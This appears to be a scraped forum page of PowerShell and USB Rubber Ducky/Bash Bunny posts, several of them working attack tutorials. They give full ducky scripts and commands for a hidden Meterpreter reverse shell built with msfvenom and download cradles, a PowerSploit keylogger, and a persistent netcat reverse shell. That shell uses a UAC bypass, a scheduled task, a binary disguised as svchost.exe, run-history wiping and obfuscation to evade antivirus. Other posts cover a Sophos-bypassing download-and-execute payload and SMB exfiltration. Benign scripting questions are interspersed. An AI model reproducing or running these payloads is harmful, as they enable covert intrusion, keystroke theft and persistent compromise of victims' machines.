Search the Community

Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.

Hello friends! Today I am going to show you a very simple 11 line USB Rubber Ducky Keylogger hack using powershell! Super simple. What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command. The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command is how many minutes you want to command to run. Here is the code: DELAY 500 GUI r DELAY 50 STRING powershell -WindowStyle hidden ENTER DELAY 100 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 300 STRING Get-Keystrokes -LogPath C:\Users\Garrett\Desktop\testing123.txt -Timeout 1 ENTER Of course, go to the www.ducktoolkit.com and encode it. Comment any suggestions / thoughts! I will be posting more scripts as I go. Also, I am working on a script to email the keylog file to your email. Will upload once I get that working. Hope you enjoy!

Hello everyone! I recently ordered a Rubber Ducky and while I wait for it to get here I thought I would start setting up a script. What I want to do in short is the following.. 1. Open Powershell as Admin ✔ 2. Bypass UAC ✔ 3. Change the PS window size ✔ 4. Open Google Chrome in a NEW window, not as a new tab. The reasoning behind this is because I would like to open the Chrome window in front of the PS window so it can be hidden during script execution. I would potentially even want to open 3 or 4 tabs in the new window. I spent quite a bit of time trying to figure out how to open a new window but most of the time I could only open a new tab. (Yes, I had Chrome open during testing of the command via powershell. Any suggestions/improvements/ideas are greatly appreciated! I look forward to unleashing the DUCK. DELAY 1000 GUI r DELAY 100 STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the powershell window STRING mode con:cols=18 lines=1 ENTER STRING Start-Process "chrome.exe" "www.google.com"

Hi everybody! So I'm simply trying some download cradles on powershell on a Windows 7. I wanted to download this test powershell script (fake Mimikatz) : https://pastebin.com/FvASwLVQ that runs calculator and print some random informations and I wanted to run the main function. So I run the following command : powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds" And immediatly after that nothing happens I'm still on the same Powershell and I can't open a a new Powershell console by any means unless I restart my computer. The thing is I tested the same command with other scripts and I get the same results... The IEX command without the "powershell -c" works perfectly and the first command works on every Windows 10! So anyone know the problem? Thanks! PSVersion : 5.1.14409.1005

Link to my original reddit post So how do we create such reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file. Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell: cd $env:public $url1="YOUR_NC64_LINK" $url2="YOUR_XML_LINK" $path1="$env:public\svchost.exe" $path2="$env:public\x.xml" (new-object net.webclient).downloadfile($url1,$path1) (new-object net.webclient).downloadfile($url2,$path2) cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml' So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created. Now you're probably thinking, this is all nice, but how the fk do I run this in one-line of code? Very simple, by invoking expression called DownloadString in powershell like this: powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')" But problem with this one-liner is, that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit: cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))" And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.

Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!

Hi all, This works fine... Get-WMIObject -Class Win32_UserProfile | Select -Expandproperty LocalPath However, the following does not. What am I doing wrong with the syntax here? Get-WMIObject -Class Win32_UserProfile | where {($.LocalPath -eq 'C:\Users\JoeBloggs')} $.LocalPath : The term '$.LocalPath' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:50 + Get-WMIObject -Class Win32_UserProfile | where {($.LocalPath -eq 'C:\Users\JoeBloggs ... + ~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: ($.LocalPath:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException

In order to provide a PoC that non-administrative access still can result in huge data breaches I present to you The Hidden PP Attack A one liner PoSh command that can be executed from a Teensy/Rubber Ducky which leaves the machine open to injections of PoSh code remotely. Quite happy with this project so I thought id drop it here. Ive lurked remotely without an account for some time without contributing, so... here you are https://simpleinfosec.com/2018/01/09/the-hidden-pp-attack-a-non-administrative-remote-shell-for-data-exfiltration/ https://github.com/secsi/HIDdenPPAttack

For a larger project, I am exploring the use of Powershell to automate network tasks. In the enclosed script, I am assuming someone has a Raspberry Pi named PiM3.local with default username and password on my local network. I use Posh-SSH which can be installed within Powershell by Install-Module Posh-SSH . I then execute a command with SSH, grab the .bash-history and put a new file in the Pi. One could, of course, use nmap to find computers with port 22 and then proceed with something like this to see what happens. One could of course use the wifi pineapple to ... and so on. Are there loose pi's where you live? RaspberySFTP.ps1

Hi all, I'm creating a PowerShell script and am attempting to use; "$variable1,$variable2,$variable3" | Add-Content -Path "file.csv" -Encoding UTF8 The variables echo/write-host as; Variable1 Hello Variable2 World Variable3 Hello World My issue is that the Add-Content above should create a CSV file like this; Hello,World,Hello World But it doesn't. Instead, it creates; Hello,World,Hello World How can I go about using Add-Content to export to CSV, but get it to ignore new lines? Opened in Excel, I want 'cell' C1 to be 'Hello World', but at the moment it's creating cell C1 as "Hello" and cell A2 (which shouldn't even exist in this case) as " World" Note: I'm stuck with PowerShell version 3 unfortunately. Thank you.

How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (Which is stored in a .ZIP file.) We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this... Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection. PS: I'm not very good at PowerShell Scripting

Hey guys.. Can someone help me out with this cmdlet error ? I've flashed my duck with no probs.. No spelling error from the scripts. When i keyed this manually with win+r key... STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')" It created a folder inside of slurp but with no files exfiltrated.. And whenever i tried to run the inject with twin duck(1).. I got this error popped out instead. Did i missed something here ? Thank you.

{ SetEnviromentVariable ("WGet", "$MyInvocation.MyCommand.Path", "Machine" ) } I've never coded in powershell but i do know a lot about batch. I would like some help with a toolkit i'm developing and i need a powershell script that will be in the install directory that will add the environment variable to the "Machine". I'm trying to automate the installation of Wget for Cmd as it's an essential for my toolkit. Any Help would be greatly appreciated Thanks, $tRiZzY

I've updated my psh_DownloadExecSMB payload to allow for exfiltration. psh_DownloadExecSMB will take any powershell payload, execute it and alert via green LED when it's completed. All file transfers happens over SMB to the Bash Bunny. In order to exfil data, have your powershell payload upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot. Bonus: Because this payload uses SMB, any captured SMB credentials will be stored as loot. My Repo: https://github.com/hink/bashbunny-payloads/tree/payload/pshExecFixes/payloads/library/execution/psh_DownloadExecSMB Pull Request: https://github.com/hak5/bashbunny-payloads/pull/268

Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So.. why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has done executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: Write file (with content) to the desktop Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible Open calculator application Message box -- powered by PowerShell For information about the payload, the payload script itself and how to configure it, it can be found at this GitHub repository: https://github.com/uintdev/RevShellBack

Okay all, I finally finished this thing well enough for me to release but more work yet to be done. It works. Try it out and let me know what you think. I got tired of fiddling with it and just decided to get something out there. https://github.com/PoSHMagiC0de/BBTPS Oh, my first time actually using github too. I usually have friends in town who does pushed on my behalf..cause I am lazy. I decided to learn git and do it myself.

Hello all, I have 4 headless PCs here at my house and I was wondering in the event the internet goes down and I need to do a file transfer or something. Could I just plug the bash bunny in and have it execute a powershell script so I don't have to find a spare monitor and keyboard? Thanks, new to the bashbunny.

Violation of CoC

Hi guys, Simple PowerShell question; If I want to copy a multi-line set of data to the clipboard, what is the best way to do it? I have the below at the moment, which successfully copies the data between the braces, however the variable $testing is literally copied as "$testing", and not as "blabla". Any better way of doing this? Thanks. $testing = "blabla" {Testing 1 Testing 2 Testing 3 $testing etc } | clip

Violation of CoC

Why is the below not working correctly? It should Write-Host 'Active', but it doesn't? PS C:\Windows\system32> $(Get-ADUser JoeBloggs -Properties *).PasswordExpired False PS C:\Windows\system32> if ($(Get-ADUser JoeBloggs -Properties *).PasswordExpired -eq "False") { Write-Host "Active" } else { Write-Host "Locked" } Locked Thanks.

Violation of CoC

I'm having trouble writing a powershell script that will 'exit' the terminal after running the code. This problem occurs when using a Quack script on the Bash Bunny. Here's the end part of the Ducky script into that I wrote: I pretty sure that's correct, and it should exit after deleting a file called ip.txt However, no such luck. What I have tried to solve the problem: STRING EXIT STRING Exit STRING exit; STRING del ip.txt; exit; But, no of these make a difference. I even checked a Ducky script written by DarrenHak5 who has the same way of exiting the powershell terminal. So, I can't understand why it's not working for me. If I manually type exit it will do so, if the HID type it, it will not exit. Guys, do you have any suggestions? Thanks

https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber It has been a while since my script was updated so if anyone want to want to help make it more effective or make it faster it would be much appreciated :D

Hi guys, I have the following PowerShell code; $FolderPath = "\\server\folder1\folder2\~folder3" $SplitFolder = $FolderPath -split '\\' I can then echo each split using; echo $SplitFolder[2] server echo $SplitFolder[3] folder1 echo $SplitFolder[4] folder2 but when I get to echo $SplitFolder[5], because the folder name begins with a tilde (~), it fails; echo $SplitFolder[5] Cannot index into a null array. At line:1 char:1 + echo $SplitFolder[5] + ~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : NullArray Any ideas why the -split fails to set the variable correctly, for the folder beginning with a tilde? Please note that I am planning on making the folder path an input from the user, so they may put in any path. Therefore, I cannot simply escape the one character, as it will be different each time. Thank you.